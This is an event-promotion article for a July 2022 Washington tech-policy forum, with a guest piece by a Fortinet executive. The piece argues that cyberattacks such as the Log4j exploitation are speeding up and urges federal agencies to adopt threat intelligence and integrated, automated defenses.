Can technology innovation – coupled with the boldest kind of leadership – work together to start fixing the most intractable problems facing America? On July 21 – we’re going to find out. The countdown to MerITocracy 2022: American Innovation Forum is on.
The in-person forum – at the Marriott Marquis in Washington, D.C., from 8:00 a.m. to 6:00 p.m. – will host bipartisan leaders from Congress, the Biden administration, and America’s tech industry to examine the most pressing problems facing citizens in our democracy, and map out creative solutions from the nexus of policy and technology. Register today.
In the lead-up to the July 21 forum, we are table-setting a host of big issues that will get serious attention at MerITocracy 2022.
Today, Jim Richberg, Public Sector Field CISO at Fortinet, talks about the increasing velocity of cyberattacks, and what the Federal government needs to do to win those battles and protect operations and citizen data:
Cyber Attacks Are Getting Faster, and Feds Must Adjust
Cyberattacks aren’t just getting more powerful; they’re also getting faster. In fact, speed and escalation are forcing Federal agencies to reassess readiness and preparation so they’re ready in time to beat back the next attack.
Attackers have come a long way since the first ransomware attack in 1989. When the AIDS Trojan debuted, the only way to spread it was via physical mail. About 20,000 infected floppy discs were sent out to AIDS researchers worldwide.
Cybercrime itself isn’t all that old. Between 1971 when the first computer virus was created and early 2000, malware was mostly relegated to mischief and attempts by authors to see if something they had created would work. The Mytob variants in 2005 changed everything by combining the functionality of a worm/backdoor/botnet, and making malware a much more powerful tool for attackers.
Since then, the threat landscape has evolved from mischief to include profitable cybercrime and nation-state attacks. The evolution of the initial term virus to today’s all-encompassing malware reflects the evolution of threats. The development and changes of these attacks were boosted by the creation of our current hyper-connected world.
No Speed Limits
While these exploits have grown more powerful since then, it’s only in the last few that the speed of attacks has jumped significantly. While most vulnerabilities lie dormant for a year or two, some of them are exploited much faster.
The recent Log4j breach presents an insightful use case for how speed is changing. In December 2021, a critical vulnerability disclosed in the Apache Log4j Java-based logging framework impacted nearly every environment with a Java application. The vulnerability was trivially easy to exploit and gave attackers a way to gain complete control of vulnerable systems.
Fortinet saw indications that the Log4j vulnerability was weaponized into malware and successfully compromised devices a mere 82 minutes after the vulnerability was announced.
Then, not long after the first discovery, two other Log4j vulnerabilities were found – meaning organizations had to update their Log4j deployments three times in a single week. Exploitation activity escalated so quickly that Log4j became the most prevalent IPS detection of the entire second half of 2021.
Log4j had nearly 50 times the volume of activity compared to ProxyLogon – another well-known exploit that occurred in early 2021. Thankfully there were no reports of significant compromises involving the Log4j, but that doesn’t mean attackers aren’t lying in wait, watching for the right time to make their move. Threat intelligence from the second half of 2021 reveals an increase in the automation and speed of attacks demonstrating more advanced persistent cybercrime strategies that are more destructive and unpredictable.
Steps Agencies Can Take
First, get to know your adversaries. A deeper understanding of attack techniques can help stop bad actors faster. By analyzing the goals of adversaries, government agencies can better align defenses against changes in attack techniques related to those goals.
To get this insight, agencies can partner with organizations that analyze malware samples. This allows security departments to get a sense of the tactics, techniques, and procedures used by each individual malware and what would have happened if the attack was successful.
That kind of intelligence is invaluable for reacting quickly to ever-increasing attack speeds. Agencies can use the information to tailor their resources to threats that present the biggest risks. If two of the malware execution techniques make up the majority of the activity, security teams can focus resources on those two techniques.
Beyond that, agencies should deploy an integrated, automated cyber solution, as they can no longer rely on siloed solutions that don’t talk to each other.
Understanding the Threat Intelligence Landscape
As threats become faster and more sophisticated across the entire attack surface, Federal cybersecurity teams need technology that interoperates and knows how to ingest real-time threat intelligence. A good solution needs to detect threat patterns, correlate data to detect anomalies, and automatically initiate a coordinated response.
This requires a cybersecurity mesh platform that provides centralized management, automation, and cohesiveness.
Agencies are facing immeasurable cybersecurity challenges. It can be overwhelming to know what obstacles to address and how to address them, but the reality is that as attacks get faster, the Federal government is going to need to follow suit. It can be done, and it doesn’t have to be painful. It just takes integrating the right solutions and a better understanding of the way attackers are changing.